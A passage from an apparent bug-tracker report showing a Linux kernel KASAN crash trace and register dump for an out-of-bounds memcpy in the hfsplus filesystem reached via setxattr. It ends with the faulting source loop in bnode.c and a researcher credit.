[  278.873186]  ? kasan_kmalloc+0xad/0xe0
[  278.873976]  ? kasan_check_write+0x14/0x20
[  278.874831]  ? strncpy_from_user+0xa8/0x1c0
[  278.875700]  ? __mnt_is_readonly.part.13+0x23/0x30
[  278.876686]  ? __mnt_want_write+0x9d/0xb0
[  278.877516]  path_setxattr+0x134/0x170
[  278.878306]  ? setxattr+0x260/0x260
[  278.879037]  ? vm_brk+0x20/0x20
[  278.879695]  __x64_sys_setxattr+0x6d/0x80
[  278.880524]  do_syscall_64+0x78/0x170
[  278.881289]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.882338] RIP: 0033:0x7f5a927e71fa
[  278.883079] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  278.886915] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  278.888448] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa
[  278.889903] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080
[  278.891341] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000
[  278.892780] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0
[  278.894234] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000
[  278.895683] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  278.905583] ---[ end trace 7f5a46c7478f1297 ]---
[  278.906815] RIP: 0010:__memcpy+0x12/0x20
[  278.907624] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  278.911448] RSP: 0018:ffff8801e8db7430 EFLAGS: 00010246
[  278.912514] RAX: a805570000016000 RBX: 0000000000001000 RCX: 0000000000000200
[  278.913989] RDX: 0000000000000000 RSI: 700556c000016000 RDI: a805570000016000
[  278.915422] RBP: ffff8801e8db7450 R08: ffffed003e09c499 R09: ffffed003e09c499
[  278.916845] R10: 0000000000000001 R11: ffffed003e09c498 R12: a805570000016000
[  278.918316] R13: 700556c000016000 R14: ffff8801e082db60 R15: 0000000000001000
[  278.919754] FS:  00007f5a92cc6700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  278.921366] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  278.922571] CR2: 00007f828de0901a CR3: 00000001e5612000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L152
		while ((len -= l) != 0) {
			l = min_t(int, len, PAGE_SIZE);
			memcpy(kmap(*++dst_page), kmap(*++src_page), l);
			kunmap(*src_page);
			set_page_dirty(*dst_page);
			kunmap(*dst_page);
		}
The out-of-bound access happens in this memcpy() as KASAN reports.

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
Note You need to log in before you can comment on or make changes to this bug.